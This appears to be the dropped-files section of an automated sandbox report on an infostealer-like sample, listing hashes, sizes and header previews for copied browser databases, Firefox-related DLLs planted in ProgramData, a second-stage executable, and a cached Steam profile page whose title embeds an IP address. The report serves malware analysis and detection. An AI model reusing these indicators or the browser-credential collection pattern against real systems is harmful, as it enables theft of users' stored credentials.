File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	363424
Entropy (8bit):	7.987313898927024
Encrypted:	false
SSDEEP:	6144:wF3qqFa1f0K9FDe8RGO93XozFt6tZjEZewycRZEelJYHq2bKEO:m3J6FDe8YOWz2tZwZrZEeDFEO
MD5:	384A847AD2833788FA253433FD2EEA8D
SHA1:	1984D8788FE40BD95A90D7D4E9DEA6C4E4FF6201
SHA-256:	DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
SHA-512:	BCDBD44837629D8881C29A7C7F6A2D4E98B52FBC49952BAD2C89340A1DEE18FAC9987AAA8A3D91905A1F88A216C0E2501201A8665F3DF7D5F627FF71A2418AAC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f.................2..........~Q... ...`....@.. ....................................`.................................,Q..O....`..............xe..(&...........O............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................`Q......H........A..............................................................VeO..z..?Z..#...b..t.H.xK.......+...,...57....>1.G2.%j.......u.-.E.mR.U....-6W.4.bW...5.>B...].. ..s..f.'.(o...}..k.P..q>j...][T..............s.p}HT-o8.....^.....p.....K7?.n.tEK>^.8.p.....+.bW...{:S...j...Z......z.d2.i....65.u.\|.vUy1....#6......P...}.$..K..\X....$..Z.D....X..q.K.^..I.>.L.j.v...-H.-.K...E.G...)r..C.,y-^6............~MJ).'....K...."p.5...9...A..0..sCU..=.......FYy...

C:\ProgramData\HDAFIIDAKJDG\AEHDAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\DAECGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\DBFIEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\EGIIJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\EHJKKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\EHJKKK-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\FHCAEG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\HDAFII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\IIJEBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\KFIJJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HDAFIIDAKJDG\KJJJKF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFIIDAKJDG\KJJJKF-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BAAEHDBFID.exe.log

Download File

Process:	C:\ProgramData\BAAEHDBFID.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34740
Entropy (8bit):	5.399858056386704
Encrypted:	false
SSDEEP:	768:Rdpqme0Ih3tAA6WG1IfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2SL:Rd8me0Ih3tAA6WG1IFhTBv++nIjBtPFm
MD5:	6D26F6162494F2E9C7A850A15EB56921
SHA1:	661B2C86DAF21AAC76DC7DA8A6A759124554C474
SHA-256:	C796EF1D62EDD314E1E1EF3D14DF8AEB0A3B73A4833C61B029F2F30E1D4BA715
SHA-512:	B92D458BFD78D68193152B4747BD2A14103812CE085C13B7952FF8BC208C88AB130D8B4522A02B71058AEE832781EF1A46BA4436CC29B4A56E72E16BC9F7757E
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://116.203.165.127\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66ecb454d2b4a_lgfdsjgds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	363424
Entropy (8bit):	7.987313898927024
Encrypted:	false
SSDEEP:	6144:wF3qqFa1f0K9FDe8RGO93XozFt6tZjEZewycRZEelJYHq2bKEO:m3J6FDe8YOWz2tZwZrZEeDFEO
MD5:	384A847AD2833788FA253433FD2EEA8D
SHA1:	1984D8788FE40BD95A90D7D4E9DEA6C4E4FF6201
SHA-256:	DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
SHA-512:	BCDBD44837629D8881C29A7C7F6A2D4E98B52FBC49952BAD2C89340A1DEE18FAC9987AAA8A3D91905A1F88A216C0E2501201A8665F3DF7D5F627FF71A2418AAC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
